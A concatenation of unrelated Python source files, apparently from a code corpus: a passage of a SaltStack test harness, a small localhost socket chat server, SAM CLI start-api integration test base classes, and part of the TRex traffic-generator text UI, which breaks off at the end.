    RUNTIME_VARS.RUNTIME_CONFIGS['minion'] = freeze(minion_opts)
    RUNTIME_VARS.RUNTIME_CONFIGS['syndic'] = freeze(syndic_opts)
    RUNTIME_VARS.RUNTIME_CONFIGS['sub_minion'] = freeze(sub_minion_opts)
    RUNTIME_VARS.RUNTIME_CONFIGS['syndic_master'] = freeze(syndic_master_opts)
    RUNTIME_VARS.RUNTIME_CONFIGS['proxy'] = freeze(proxy_opts)
    # Create every runtime directory the daemons expect.
    verify_env([os.path.join(master_opts['pki_dir'], 'minions'),
                os.path.join(master_opts['pki_dir'], 'minions_pre'),
                os.path.join(master_opts['pki_dir'], 'minions_rejected'),
                os.path.join(master_opts['pki_dir'], 'minions_denied'),
                os.path.join(master_opts['cachedir'], 'jobs'),
                os.path.join(master_opts['cachedir'], 'raet'),
                os.path.join(master_opts['root_dir'], 'cache', 'tokens'),
                os.path.join(syndic_master_opts['pki_dir'], 'minions'),
                os.path.join(syndic_master_opts['pki_dir'], 'minions_pre'),
                os.path.join(syndic_master_opts['pki_dir'], 'minions_rejected'),
                os.path.join(syndic_master_opts['cachedir'], 'jobs'),
                os.path.join(syndic_master_opts['cachedir'], 'raet'),
                os.path.join(syndic_master_opts['root_dir'], 'cache', 'tokens'),
                os.path.join(master_opts['pki_dir'], 'accepted'),
                os.path.join(master_opts['pki_dir'], 'rejected'),
                os.path.join(master_opts['pki_dir'], 'pending'),
                os.path.join(syndic_master_opts['pki_dir'], 'accepted'),
                os.path.join(syndic_master_opts['pki_dir'], 'rejected'),
                os.path.join(syndic_master_opts['pki_dir'], 'pending'),
                os.path.join(syndic_master_opts['cachedir'], 'raet'),
                os.path.join(minion_opts['pki_dir'], 'accepted'),
                os.path.join(minion_opts['pki_dir'], 'rejected'),
                os.path.join(minion_opts['pki_dir'], 'pending'),
                os.path.join(minion_opts['cachedir'], 'raet'),
                os.path.join(sub_minion_opts['pki_dir'], 'accepted'),
                os.path.join(sub_minion_opts['pki_dir'], 'rejected'),
                os.path.join(sub_minion_opts['pki_dir'], 'pending'),
                os.path.join(sub_minion_opts['cachedir'], 'raet'),
                os.path.dirname(master_opts['log_file']),
                minion_opts['extension_modules'],
                sub_minion_opts['extension_modules'],
                sub_minion_opts['pki_dir'],
                master_opts['sock_dir'],
                syndic_master_opts['sock_dir'],
                sub_minion_opts['sock_dir'],
                minion_opts['sock_dir'],
                RUNTIME_VARS.TMP_STATE_TREE,
                RUNTIME_VARS.TMP_PRODENV_STATE_TREE,
                TMP,
                ],
               RUNTIME_VARS.RUNNING_TESTS_USER)
    cls.master_opts = master_opts
    cls.minion_opts = minion_opts
    # cls.proxy_opts = proxy_opts
    cls.sub_minion_opts = sub_minion_opts
    cls.syndic_opts = syndic_opts
    cls.syndic_master_opts = syndic_master_opts
    cls.proxy_opts = proxy_opts
    # <---- Verify Environment -----------------------------------------------------------------------------------
def __exit__(self, type, value, traceback):
    '''
    Kill the minion and master processes.

    Tears down every daemon this test harness started: the sub minion,
    minion, optional proxy minion, master, and — when present — the syndic
    and syndic master.  Afterwards the log server, mockbin PATH entry,
    sshd, and the multiprocessing logging machinery are shut down.
    '''
    self.sub_minion_process.terminate()
    self.minion_process.terminate()
    # The proxy minion is optional; only terminate it when it was started.
    if hasattr(self, 'proxy_process'):
        self.proxy_process.terminate()
    self.master_process.terminate()
    # Syndic daemons only exist in syndic-enabled runs; a missing attribute
    # simply means they were never started.
    try:
        self.syndic_process.terminate()
    except AttributeError:
        pass
    try:
        self.smaster_process.terminate()
    except AttributeError:
        pass
    #salt.utils.process.clean_proc(self.sub_minion_process, wait_for_kill=50)
    #self.sub_minion_process.join()
    #salt.utils.process.clean_proc(self.minion_process, wait_for_kill=50)
    #self.minion_process.join()
    #salt.utils.process.clean_proc(self.master_process, wait_for_kill=50)
    #self.master_process.join()
    #try:
    #    salt.utils.process.clean_proc(self.syndic_process, wait_for_kill=50)
    #    self.syndic_process.join()
    #except AttributeError:
    #    pass
    #try:
    #    salt.utils.process.clean_proc(self.smaster_process, wait_for_kill=50)
    #    self.smaster_process.join()
    #except AttributeError:
    #    pass
    self.log_server.server_close()
    self.log_server.shutdown()
    self._exit_mockbin()
    self._exit_ssh()
    self.log_server_process.join()
    # Shutdown the multiprocessing logging queue listener
    salt_log_setup.shutdown_multiprocessing_logging()
    salt_log_setup.shutdown_multiprocessing_logging_listener(daemonizing=True)
def pre_setup_minions(self):
    '''
    Hook invoked before the minions are set up.

    Subclass this method for additional minion setups.
    '''
def setup_minions(self):
    '''
    Minions setup routines.

    No-op by default; subclasses override to perform the actual setup.
    '''
def post_setup_minions(self):
    '''
    Subclass this method to execute code after the minions have been setup.
    '''
def _enter_mockbin(self):
    '''Prepend the mock binaries directory to ``PATH`` (idempotent).'''
    entries = os.environ.get('PATH', '').split(os.pathsep)
    if MOCKBIN not in entries:
        entries = [MOCKBIN] + entries
    os.environ['PATH'] = os.pathsep.join(entries)
def _exit_ssh(self):
    '''Stop the test sshd daemon, if one was started for this run.'''
    if hasattr(self, 'sshd_process'):
        try:
            self.sshd_process.kill()
        except OSError as exc:
            # errno 3 (ESRCH): process already gone — anything else is real.
            if exc.errno != 3:
                raise
        # Also kill the pid recorded in the sshd pidfile, in case the
        # tracked process handle and the real daemon diverge.
        with salt.utils.files.fopen(self.sshd_pidfile) as fhr:
            try:
                os.kill(int(fhr.read()), signal.SIGKILL)
            except OSError as exc:
                if exc.errno != 3:
                    raise
def _exit_mockbin(self):
    '''Remove the mock binaries directory from ``PATH``, if present.'''
    entries = os.environ.get('PATH', '').split(os.pathsep)
    if MOCKBIN in entries:
        # Drops the first occurrence, matching list.remove() semantics.
        entries.remove(MOCKBIN)
    os.environ['PATH'] = os.pathsep.join(entries)
@classmethod
def clean(cls):
    '''
    Clean out the tmp files.

    Removes the harness scratch directories and both state trees.
    '''
    def remove_readonly(func, path, excinfo):
        # shutil.rmtree error hook: give the owner full permissions and
        # retry the failed operation (handles read-only files).
        os.chmod(path, stat.S_IRWXU)
        func(path)
    for dirname in (TMP, RUNTIME_VARS.TMP_STATE_TREE, RUNTIME_VARS.TMP_PRODENV_STATE_TREE):
        if os.path.isdir(dirname):
            shutil.rmtree(dirname, onerror=remove_readonly)
def wait_for_jid(self, targets, jid, timeout=120):
    '''
    Poll until job *jid* has finished on all *targets*.

    Returns True when the job is no longer reported as running by any
    target (confirmed over two consecutive polls to avoid false
    positives), or False when *timeout* seconds elapse first.
    '''
    time.sleep(1)  # Allow some time for minions to accept jobs
    now = datetime.now()
    expire = now + timedelta(seconds=timeout)
    # job_finished implements a two-phase confirmation: the first poll
    # that reports "not running" only arms the flag; a second consecutive
    # "not running" poll confirms completion.
    job_finished = False
    while now <= expire:
        running = self.__client_job_running(targets, jid)
        # Blank the status line before rewriting it.
        sys.stdout.write(
            '\r{0}\r'.format(
                ' ' * getattr(self.parser.options, 'output_columns', PNUM)
            )
        )
        if not running and job_finished is False:
            # Let's not have false positives and wait one more seconds
            job_finished = True
        elif not running and job_finished is True:
            return True
        elif running and job_finished is True:
            # Job resurfaced as running — disarm and keep waiting.
            job_finished = False
        if job_finished is False:
            sys.stdout.write(
                ' * {LIGHT_YELLOW}[Quit in {0}]{ENDC} Waiting for {1}'.format(
                    '{0}'.format(expire - now).rsplit('.', 1)[0],
                    ', '.join(running),
                    **self.colors
                )
            )
            sys.stdout.flush()
        time.sleep(1)
        now = datetime.now()
    else:  # pylint: disable=W0120
        # while/else: only reached when the loop expires without returning.
        sys.stdout.write(
            '\n {LIGHT_RED}*{ENDC} ERROR: Failed to get information '
            'back\n'.format(**self.colors)
        )
        sys.stdout.flush()
    return False
def __client_job_running(self, targets, jid):
    '''Return the ids from *targets* still running job *jid*.'''
    running = self.client.cmd(
        list(targets), 'saltutil.running', tgt_type='list'
    )
    active = []
    for minion_id, jobs in six.iteritems(running):
        if jobs and jobs[0]['jid'] == jid:
            active.append(minion_id)
    return active
def wait_for_minion_connections(self, targets, timeout):
    '''
    Block until every minion in *targets* answers a ``test.ping``, or
    exit the test run (SystemExit) after *timeout* seconds.
    '''
    salt.utils.appendproctitle('WaitForMinionConnections')
    sys.stdout.write(
        ' {LIGHT_BLUE}*{ENDC} Waiting at most {0} for minions({1}) to '
        'connect back\n'.format(
            (timeout > 60 and
             timedelta(seconds=timeout) or
             '{0} secs'.format(timeout)),
            ', '.join(targets),
            **self.colors
        )
    )
    sys.stdout.flush()
    # Minions are removed from this set as they answer; empty set == done.
    expected_connections = set(targets)
    now = datetime.now()
    expire = now + timedelta(seconds=timeout)
    while now <= expire:
        # Blank and rewrite the countdown status line.
        sys.stdout.write(
            '\r{0}\r'.format(
                ' ' * getattr(self.parser.options, 'output_columns', PNUM)
            )
        )
        sys.stdout.write(
            ' * {LIGHT_YELLOW}[Quit in {0}]{ENDC} Waiting for {1}'.format(
                '{0}'.format(expire - now).rsplit('.', 1)[0],
                ', '.join(expected_connections),
                **self.colors
            )
        )
        sys.stdout.flush()
        try:
            responses = self.client.cmd(
                list(expected_connections), 'test.ping', tgt_type='list',
            )
        # we'll get this exception if the master process hasn't finished starting yet
        except SaltClientError:
            time.sleep(0.1)
            now = datetime.now()
            continue
        for target in responses:
            if target not in expected_connections:
                # Someone(minion) else "listening"?
                continue
            expected_connections.remove(target)
            sys.stdout.write(
                '\r{0}\r'.format(
                    ' ' * getattr(self.parser.options, 'output_columns',
                                  PNUM)
                )
            )
            sys.stdout.write(
                ' {LIGHT_GREEN}*{ENDC} {0} connected.\n'.format(
                    target, **self.colors
                )
            )
            sys.stdout.flush()
        if not expected_connections:
            return
        time.sleep(1)
        now = datetime.now()
    else:  # pylint: disable=W0120
        # while/else: the timeout expired with minions still missing.
        print(
            '\n {LIGHT_RED}*{ENDC} WARNING: Minions failed to connect '
            'back. Tests requiring them WILL fail'.format(**self.colors)
        )
        try:
            print_header(
                '=', sep='=', inline=True,
                width=getattr(self.parser.options, 'output_columns', PNUM)
            )
        except TypeError:
            print_header('=', sep='=', inline=True)
        raise SystemExit()
def sync_minion_modules_(self, modules_kind, targets, timeout=None):
    '''
    Run ``saltutil.sync_<modules_kind>`` on *targets* and wait for every
    minion to report its sync result.

    Returns True on success, False when a minion reports a sync error;
    raises SystemExit when the job itself fails to finish in time.
    '''
    if not timeout:
        timeout = 120
    # Let's sync all connected minions
    # NOTE(review): the format string only uses {1}; the joined target
    # list passed as positional 0 is never rendered — confirm intent.
    print(
        ' {LIGHT_BLUE}*{ENDC} Syncing minion\'s {1} '
        '(saltutil.sync_{1})'.format(
            ', '.join(targets),
            modules_kind,
            **self.colors
        )
    )
    syncing = set(targets)
    jid_info = self.client.run_job(
        list(targets), 'saltutil.sync_{0}'.format(modules_kind),
        tgt_type='list',
        timeout=999999999999999,
    )
    if self.wait_for_jid(targets, jid_info['jid'], timeout) is False:
        print(
            ' {LIGHT_RED}*{ENDC} WARNING: Minions failed to sync {0}. '
            'Tests requiring these {0} WILL fail'.format(
                modules_kind, **self.colors)
        )
        raise SystemExit()
    # Drain the job returns until every target has reported back.
    while syncing:
        rdata = self.client.get_full_returns(jid_info['jid'], syncing, 1)
        if rdata:
            for name, output in six.iteritems(rdata):
                if not output['ret']:
                    # Already synced!?
                    syncing.remove(name)
                    continue
                # A string return (instead of a list of synced modules)
                # signals an error from the minion.
                if isinstance(output['ret'], six.string_types):
                    # An errors has occurred
                    print(
                        ' {LIGHT_RED}*{ENDC} {0} Failed to sync {2}: '
                        '{1}'.format(
                            name, output['ret'],
                            modules_kind,
                            **self.colors)
                    )
                    return False
                print(
                    '   {LIGHT_GREEN}*{ENDC} Synced {0} {2}: '
                    '{1}'.format(
                        name,
                        ', '.join(output['ret']),
                        modules_kind, **self.colors
                    )
                )
                # Synced!
                try:
                    syncing.remove(name)
                except KeyError:
                    # Duplicate return for the same minion.
                    print(
                        ' {LIGHT_RED}*{ENDC} {0} already synced??? '
                        '{1}'.format(name, output, **self.colors)
                    )
    return True
def sync_minion_states(self, targets, timeout=None):
    '''Sync state modules to *targets* (thin wrapper over sync_minion_modules_).'''
    salt.utils.appendproctitle('SyncMinionStates')
    self.sync_minion_modules_('states', targets, timeout=timeout)
def sync_minion_modules(self, targets, timeout=None):
    '''Sync execution modules to *targets* (thin wrapper over sync_minion_modules_).'''
    salt.utils.appendproctitle('SyncMinionModules')
    self.sync_minion_modules_('modules', targets, timeout=timeout)
def sync_minion_grains(self, targets, timeout=None):
    '''Sync grains modules to *targets* (thin wrapper over sync_minion_modules_).'''
    salt.utils.appendproctitle('SyncMinionGrains')
    self.sync_minion_modules_('grains', targets, timeout=timeout)
|
server.py | import socket
import threading
import time
HOST = '127.0.0.1' # Standard loopback interface address (localhost)
PORT = 65339 # Port to listen on (non-privileged ports are > 1023)
def client(conn, addr, startchat):
    '''
    Per-client handler thread.

    Replays the chat backlog to the new client, then relays everything the
    client sends to all connected clients via post().

    NOTE(review): the caller actually passes (conn, name, chat), so *addr*
    holds the client's name here — confirm before renaming.
    '''
    with conn:
        print('Connected by', addr)
        # Replay the backlog, all entries but the last (presumably the
        # client's own "joined" line — TODO confirm), then send the
        # sentinel token marking end-of-history.
        for message in startchat[:-1]:
            conn.sendall(bytes(message, 'utf-8'))
        conn.sendall(bytes("9849846516189615", 'utf-8'))
        while True:
            data = conn.recv(1024)
            if not data:
                # Client disconnected: drop its entry from the global
                # registry.  BUG FIX: the original compared the stored
                # (conn, addr) tuple against the bare socket (never equal)
                # and called tuple.remove() (an AttributeError had it ever
                # matched); remove the matching list entry instead.
                for entry in clients:
                    if entry[0] is conn:
                        print("remove")
                        clients.remove(entry)
                        break
                break
            d = repr(addr) + ":" + repr(data)
            post(d)
# Global chat backlog; each entry is a timestamped line ending in "\n".
chat = []
# Connected clients as (socket, address) tuples; mutated by handler threads.
clients = []
def stamp():
    '''Return an "H:M:" local-time prefix (no zero padding, matches original).'''
    now = time.localtime()
    return "{0}:{1}:".format(now.tm_hour, now.tm_min)
def post(msg):
    '''
    Timestamp *msg*, append it to the chat backlog, and broadcast it to
    every connected client.
    '''
    msg = stamp()+msg
    chat.append(msg+"\n")
    for cl in clients:
        try:
            cl[0].sendall(bytes(msg,'utf-8'))
        except:
            # Best-effort broadcast: a dead socket is skipped here and
            # cleaned up by its own handler thread.
            pass
# Accept loop: handshake each new connection for its name, announce the
# join, register the client, and spawn a handler thread for it.
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
    s.bind((HOST, PORT))
    try:
        s.listen()
        while True:
            conn, addr = s.accept()
            # Handshake: read until the 16-digit sentinel arrives; the bytes
            # before it (minus repr() quoting) are taken as the client name.
            while True:
                name = conn.recv(1024)
                name = repr(name)
                print(name)
                if "9849846516189615" in name:
                    # Strip repr()'s leading quote and the trailing
                    # sentinel-plus-quote (16 + 1 characters).
                    name = name[1:-17]
                    break
            login = name+" joined"
            post(login)
            clients.append((conn,addr))
            print('Connected by', addr)
            # NOTE(review): client() is declared as (conn, addr, startchat)
            # but receives (conn, name, chat) — its second argument is the
            # name, not the address. Confirm intent before renaming.
            mythread = threading.Thread(target=client, args = (conn,name,chat),name = "Thread-{}".format(addr),) # ...Instantiate a thread and pass a unique ID to it
            mythread.start()
    except (KeyboardInterrupt, SystemExit):
        s.close()
|
start_api_integ_base.py | import shutil
import uuid
from typing import List, Optional, Dict
from unittest import TestCase, skipIf
import threading
from subprocess import Popen, PIPE
import os
import logging
import random
from pathlib import Path
import docker
from docker.errors import APIError
from tests.testing_utils import kill_process
from tests.testing_utils import SKIP_DOCKER_MESSAGE, SKIP_DOCKER_TESTS, run_command
LOG = logging.getLogger(__name__)
@skipIf(SKIP_DOCKER_TESTS, SKIP_DOCKER_MESSAGE)
class StartApiIntegBaseClass(TestCase):
    """
    Base class for ``sam local start-api`` integration tests.

    setUpClass resolves the template path, optionally builds the app,
    removes stale docker containers, and launches ``sam local start-api``
    on a random port, keeping a background thread draining its stderr.
    Class attributes below are knobs for subclasses.
    """

    template: Optional[str] = None
    container_mode: Optional[str] = None
    parameter_overrides: Optional[Dict[str, str]] = None
    binary_data_file: Optional[str] = None
    integration_dir = str(Path(__file__).resolve().parents[2])
    invoke_image: Optional[List] = None
    layer_cache_base_dir: Optional[str] = None
    build_before_invoke = False
    build_overrides: Optional[Dict[str, str]] = None

    @classmethod
    def setUpClass(cls):
        # This is the directory for tests/integration which will be used to file the testdata
        # files for integ tests.
        # NOTE: cls.template_path is expected to be provided by subclasses.
        cls.template = cls.integration_dir + cls.template_path
        if cls.binary_data_file:
            cls.binary_data_file = os.path.join(cls.integration_dir, cls.binary_data_file)
        if cls.build_before_invoke:
            cls.build()
        cls.port = str(StartApiIntegBaseClass.random_port())
        cls.docker_client = docker.from_env()
        # Remove leftover containers from earlier runs so ports/names are free.
        for container in cls.docker_client.api.containers():
            try:
                cls.docker_client.api.remove_container(container, force=True)
            except APIError as ex:
                LOG.error("Failed to remove container %s", container, exc_info=ex)
        cls.start_api()

    @classmethod
    def build(cls):
        """Run ``sam build`` (or ``samdev build``) in the template's directory."""
        command = "sam"
        if os.getenv("SAM_CLI_DEV"):
            command = "samdev"
        command_list = [command, "build"]
        if cls.build_overrides:
            overrides_arg = " ".join(
                ["ParameterKey={},ParameterValue={}".format(key, value) for key, value in cls.build_overrides.items()]
            )
            command_list += ["--parameter-overrides", overrides_arg]
        working_dir = str(Path(cls.template).resolve().parents[0])
        run_command(command_list, cwd=working_dir)

    @classmethod
    def start_api(cls):
        """Launch ``sam local start-api`` and block until it reports ready."""
        command = "sam"
        if os.getenv("SAM_CLI_DEV"):
            command = "samdev"
        command_list = [command, "local", "start-api", "-t", cls.template, "-p", cls.port]
        if cls.container_mode:
            command_list += ["--warm-containers", cls.container_mode]
        if cls.parameter_overrides:
            command_list += ["--parameter-overrides", cls._make_parameter_override_arg(cls.parameter_overrides)]
        if cls.layer_cache_base_dir:
            command_list += ["--layer-cache-basedir", cls.layer_cache_base_dir]
        if cls.invoke_image:
            for image in cls.invoke_image:
                command_list += ["--invoke-image", image]
        cls.start_api_process = Popen(command_list, stderr=PIPE)
        # Block until Flask's banner shows the server is accepting requests.
        while True:
            line = cls.start_api_process.stderr.readline()
            line_as_str = str(line.decode("utf-8")).strip()
            if line_as_str:
                # Lazy %-style args avoid formatting when the level is off.
                LOG.info("%s", line_as_str)
            if "(Press CTRL+C to quit)" in line_as_str:
                break
        cls.stop_reading_thread = False

        def read_sub_process_stderr():
            # Keep draining stderr so the child never blocks on a full pipe.
            while not cls.stop_reading_thread:
                cls.start_api_process.stderr.readline()

        cls.read_threading = threading.Thread(target=read_sub_process_stderr, daemon=True)
        cls.read_threading.start()

    @classmethod
    def _make_parameter_override_arg(cls, overrides):
        # BUG FIX: this classmethod's first parameter was named ``self``;
        # it receives the class, so it is now correctly named ``cls``.
        return " ".join(["ParameterKey={},ParameterValue={}".format(key, value) for key, value in overrides.items()])

    @classmethod
    def tearDownClass(cls):
        # After all the tests run, we need to kill the start-api process.
        cls.stop_reading_thread = True
        kill_process(cls.start_api_process)

    @staticmethod
    def random_port():
        """Return a random port in [30000, 40000] for the local API."""
        return random.randint(30000, 40000)

    @staticmethod
    def get_binary_data(filename):
        """Return *filename*'s bytes, or None when no filename is given."""
        if not filename:
            return None
        with open(filename, "rb") as fp:
            return fp.read()
class WatchWarmContainersIntegBaseClass(StartApiIntegBaseClass):
    '''
    Base class for warm-container "watch" tests: materializes a scratch
    project directory (template, code, Dockerfiles) before starting the
    API, and deletes it again after the tests finish.
    '''
    temp_path: Optional[str] = None
    template_path: Optional[str] = None
    code_path: Optional[str] = None
    docker_file_path: Optional[str] = None

    @classmethod
    def setUpClass(cls):
        # Unique scratch directory name under the integration dir.
        cls.temp_path = str(uuid.uuid4()).replace("-", "")[:10]
        working_dir = str(Path(cls.integration_dir).resolve().joinpath(cls.temp_path))
        if Path(working_dir).resolve().exists():
            shutil.rmtree(working_dir, ignore_errors=True)
        os.mkdir(working_dir)
        os.mkdir(Path(cls.integration_dir).resolve().joinpath(cls.temp_path).joinpath("dir"))
        # Paths are relative to integration_dir (they are concatenated by
        # the parent class's setUpClass).
        cls.template_path = f"/{cls.temp_path}/template.yaml"
        cls.code_path = f"/{cls.temp_path}/main.py"
        cls.code_path2 = f"/{cls.temp_path}/dir/main2.py"
        cls.docker_file_path = f"/{cls.temp_path}/Dockerfile"
        cls.docker_file_path2 = f"/{cls.temp_path}/Dockerfile2"
        # template_content / code_content / docker_file_content are expected
        # to be defined by concrete subclasses — TODO confirm.
        if cls.template_content:
            cls._write_file_content(cls.template_path, cls.template_content)
        if cls.code_content:
            cls._write_file_content(cls.code_path, cls.code_content)
        if cls.docker_file_content:
            cls._write_file_content(cls.docker_file_path, cls.docker_file_content)
        super().setUpClass()

    @classmethod
    def _write_file_content(cls, path, content):
        # *path* is relative to integration_dir (leading "/" included).
        with open(cls.integration_dir + path, "w") as f:
            f.write(content)

    @classmethod
    def tearDownClass(cls):
        # Stop the API first, then remove the scratch directory.
        super().tearDownClass()
        working_dir = str(Path(cls.integration_dir).resolve().joinpath(cls.temp_path))
        if Path(working_dir).resolve().exists():
            shutil.rmtree(working_dir, ignore_errors=True)
|
trex_tui.py | from __future__ import print_function
import termios
import sys
import os
import time
import threading
from collections import OrderedDict, deque
from texttable import ansi_len
import datetime
import readline
if sys.version_info > (3,0):
from io import StringIO
else:
from cStringIO import StringIO
from ..utils.text_opts import *
from ..utils.common import list_intersect
from ..utils import text_tables
from ..utils.filters import ToggleFilter
from ..common.trex_exceptions import TRexError
from ..astf.trex_astf_exceptions import ASTFErrorBadTG
class TUIQuit(Exception):
    '''Raised internally to request a clean exit from the TUI main loop.'''
    pass
def ascii_split(s):
    '''Split *s* on newlines, keeping only lines with visible (ANSI-aware) content.'''
    return [line for line in s.split('\n') if ansi_len(line) > 0]
class SimpleBar(object):
    '''A tiny text spinner: every show() call prints the next frame of *pattern*.'''

    def __init__(self, desc, pattern):
        self.desc = desc
        self.pattern = pattern
        self.pattern_len = len(pattern)
        self.index = 0

    def show(self, buffer):
        '''Print the current frame (prefixed by *desc* when set) and advance.'''
        frame = self.pattern[self.index]
        if self.desc:
            text = "{0} {1}".format(self.desc, frame)
        else:
            text = "{0}".format(frame)
        print(format_text(text, 'bold'), file=buffer)
        self.index = (self.index + 1) % self.pattern_len
# base type of a panel
# base type of a panel
class TrexTUIPanel(object):
    '''Abstract base class for TUI panels managed by TrexTUIPanelManager.'''

    def __init__(self, mng, name):
        self.mng = mng
        self.name = name
        self.client = mng.client
        self.is_graph = False

    def show(self, buffer):
        '''Render the panel into *buffer*. Subclasses must override.'''
        raise NotImplementedError("must implement this")

    def get_key_actions(self):
        '''Return the panel's key -> action mapping. Subclasses must override.'''
        raise NotImplementedError("must implement this")

    def get_name(self):
        return self.name
# dashboard panel
# dashboard panel
class TrexTUIDashBoard(TrexTUIPanel):
    '''
    Main dashboard panel: global stats plus per-port stats, with a
    toggleable port-view filter and pause/resume/clear key actions.
    '''

    FILTER_ACQUIRED = 1
    FILTER_ALL = 2

    def __init__(self, mng):
        super(TrexTUIDashBoard, self).__init__(mng, "dashboard")
        self.ports = self.client.get_all_ports()
        self.key_actions = OrderedDict()
        self.key_actions['c'] = {'action': self.action_clear, 'legend': 'clear', 'show': True}
        self.key_actions['p'] = {'action': self.action_pause, 'legend': 'pause', 'show': True, 'color': 'red'}
        self.key_actions['r'] = {'action': self.action_resume, 'legend': 'resume', 'show': True, 'color': 'blue'}
        self.key_actions['o'] = {'action': self.action_show_owned, 'legend': 'owned ports', 'show': True}
        self.key_actions['n'] = {'action': self.action_reset_view, 'legend': 'reset view', 'show': True}
        self.key_actions['a'] = {'action': self.action_show_all, 'legend': 'all ports', 'show': True}
        # register all the ports to the toggle action
        for port_id in self.ports:
            self.key_actions[str(port_id)] = {'action': self.action_toggle_port(port_id), 'legend': 'port {0}'.format(port_id), 'show': False}
        self.toggle_filter = ToggleFilter(self.ports)
        # Default view: owned ports when any are acquired, otherwise all.
        if self.client.get_acquired_ports():
            self.action_show_owned()
        else:
            self.action_show_all()

    def get_showed_ports(self):
        '''Return the ports currently selected by the toggle filter.'''
        return self.toggle_filter.filter_items()

    def show(self, buffer):
        self.client._show_global_stats(buffer = buffer)
        if self.get_showed_ports():
            self.client._show_port_stats(ports = self.get_showed_ports(), buffer = buffer)

    def get_key_actions(self):
        '''Return only the actions valid for the current port selection/state.'''
        allowed = OrderedDict()
        allowed['n'] = self.key_actions['n']
        allowed['o'] = self.key_actions['o']
        allowed['a'] = self.key_actions['a']
        for i in self.ports:
            allowed[str(i)] = self.key_actions[str(i)]
        if self.get_showed_ports():
            allowed['c'] = self.key_actions['c']
        # if not all ports are acquired - no operations
        if not (set(self.get_showed_ports()) <= set(self.client.get_acquired_ports())):
            return allowed
        if self.client.get_mode() == 'STL':
            # if any/some ports can be resumed
            if set(self.get_showed_ports()) & set(self.client.get_paused_ports()):
                allowed['r'] = self.key_actions['r']
            # if any/some ports are transmitting - support those actions
            if set(self.get_showed_ports()) & set(self.client.get_transmitting_ports()):
                allowed['p'] = self.key_actions['p']
        return allowed

    ######### actions

    def action_pause(self):
        '''Pause traffic on the shown ports that are transmitting.'''
        ports = list_intersect(self.get_showed_ports(), self.client.get_transmitting_ports())
        try:
            rc = self.client.pause(ports = ports)
        except TRexError:
            # Errors are swallowed — the dashboard redraw reflects reality.
            pass
        return ""

    def action_resume(self):
        '''Resume traffic on the shown ports that are paused.'''
        ports = list_intersect(self.get_showed_ports(), self.client.get_paused_ports())
        try:
            self.client.resume(ports = ports)
        except TRexError:
            pass
        return ""

    def action_reset_view(self):
        self.toggle_filter.reset()
        return ""

    def action_show_owned(self):
        self.toggle_filter.reset()
        self.toggle_filter.toggle_items(*self.client.get_acquired_ports())
        return ""

    def action_show_all(self):
        self.toggle_filter.reset()
        self.toggle_filter.toggle_items(*self.client.get_all_ports())
        return ""

    def action_clear(self):
        self.client.clear_stats(self.toggle_filter.filter_items())
        return "cleared all stats"

    def action_toggle_port(self, port_id):
        # Returns a closure so each port key toggles its own port.
        def action_toggle_port_x():
            self.toggle_filter.toggle_item(port_id)
            return ""
        return action_toggle_port_x
# streams stats
# streams stats
class TrexTUIStreamsStats(TrexTUIPanel):
    '''Panel showing global stats plus per-stream statistics (STL mode).'''

    def __init__(self, mng):
        super(TrexTUIStreamsStats, self).__init__(mng, "sstats")
        self.key_actions = OrderedDict()
        self.key_actions['c'] = {'action': self.action_clear, 'legend': 'clear', 'show': True}

    def show(self, buffer):
        self.client._show_global_stats(buffer = buffer)
        self.client._show_streams_stats(buffer = buffer)

    def get_key_actions(self):
        return self.key_actions

    def action_clear(self):
        '''Clear per-stream (pgid) statistics.'''
        self.client.pgid_stats.clear_stats()
        return ""
# latency stats
# latency stats
class TrexTUILatencyStats(TrexTUIPanel):
    '''Panel showing latency statistics, toggleable between table and histogram.'''

    def __init__(self, mng):
        super(TrexTUILatencyStats, self).__init__(mng, "lstats")
        self.key_actions = OrderedDict()
        self.key_actions['c'] = {'action': self.action_clear, 'legend': 'clear', 'show': True}
        self.key_actions['h'] = {'action': self.action_toggle_histogram, 'legend': 'histogram toggle', 'show': True}
        # False -> latency table view; True -> histogram view.
        self.is_histogram = False

    def show(self, buffer):
        self.client._show_global_stats(buffer = buffer)
        if self.is_histogram:
            self.client._show_latency_histogram(buffer = buffer)
        else:
            self.client._show_latency_stats(buffer = buffer)

    def get_key_actions(self):
        return self.key_actions

    def action_toggle_histogram(self):
        self.is_histogram = not self.is_histogram
        return ""

    def action_clear(self):
        self.client.pgid_stats.clear_stats()
        return ""
class TrexTUIAstfTrafficStats(TrexTUIPanel):
    '''
    ASTF traffic-stats panel with vertical scrolling (Up/Down) and
    template-group paging (Left/Right).
    '''

    def __init__(self, mng):
        super(TrexTUIAstfTrafficStats, self).__init__(mng, "astats")
        # start_row is the scroll offset into the rendered stats lines.
        self.start_row = 0
        self.max_lines = TrexTUI.MIN_ROWS - 16 # 16 is size of panels below and above
        self.num_lines = 0
        # tgid 0 == aggregate over all template groups.
        self.tgid = 0
        self.is_sum = True if self.client.is_dynamic else False
        self.key_actions = OrderedDict()
        self.key_actions['c'] = {'action': self.action_clear, 'legend': 'clear', 'show': Predicate(lambda : self.tgid == 0)}
        self.key_actions['Up'] = {'action': self.action_up, 'legend': 'scroll up', 'show': True}
        self.key_actions['Down'] = {'action': self.action_down, 'legend': 'scroll down', 'show': True}
        self.key_actions['Left'] = {'action': self.action_left, 'legend': 'previous TG', 'show': True}
        self.key_actions['Right'] = {'action': self.action_right, 'legend': 'next TG', 'show': True}

    def show(self, buffer):
        self.client._show_global_stats(buffer = buffer)
        # Render into a scratch buffer first so we can window the output.
        buf = StringIO()
        have_into = False
        try:
            self.client._show_traffic_stats(False, buffer = buf, tgid = self.tgid, is_sum = self.is_sum)
            have_into = True
        except ASTFErrorBadTG:
            # Selected template group vanished; fall back to the aggregate.
            self.tgid = 0
        if have_into:
            buf.seek(0)
            out_lines = buf.readlines()
            self.num_lines = len(out_lines)
            # Emit only the visible window of lines.
            buffer.write(''.join(out_lines[self.start_row:self.start_row+self.max_lines]))
            buffer.write('\n')

    def get_key_actions(self):
        return self.key_actions

    def action_clear(self):
        self.client.clear_traffic_stats()
        return ""

    def action_up(self):
        # Clamp the offset if content shrank, otherwise scroll one line up.
        if self.start_row > self.num_lines:
            self.start_row = self.num_lines
        elif self.start_row > 0:
            self.start_row -= 1

    def action_down(self):
        if self.start_row < self.num_lines - self.max_lines:
            self.start_row += 1

    def action_left(self):
        if self.tgid > 0:
            self.tgid -= 1

    def action_right(self):
        if self.tgid < self.client._get_num_of_tgids():
            self.tgid += 1
# ASTF latency stats
# ASTF latency stats
class TrexTUIAstfLatencyStats(TrexTUIPanel):
